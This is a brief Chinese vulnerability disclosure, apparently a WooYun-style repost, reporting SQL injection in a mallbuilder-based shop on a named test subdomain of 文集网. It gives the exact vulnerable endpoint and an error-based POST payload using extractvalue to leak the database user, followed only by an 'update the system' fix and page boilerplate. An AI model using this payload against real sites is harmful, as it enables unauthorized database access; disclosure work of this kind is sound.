文集网某站存在SQL注入漏洞
漏洞影响网站
http://test.wenji99.com
注入点
http://test.wenji99.com/cate_show_ajax.php?oper=ajax&call=get_cate
POST参数
catid=12313213131313113) and extractvalue(1,concat(0x7e7e7e,user(),0x7e7e7e))%23
WooYun: mallbuilder多用户商城最新版SQL注入(四)
获取到的数据库当前用户信息:[email protected]
解决方案:
更新系统
您可能感兴趣的文章:
如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!
网友评论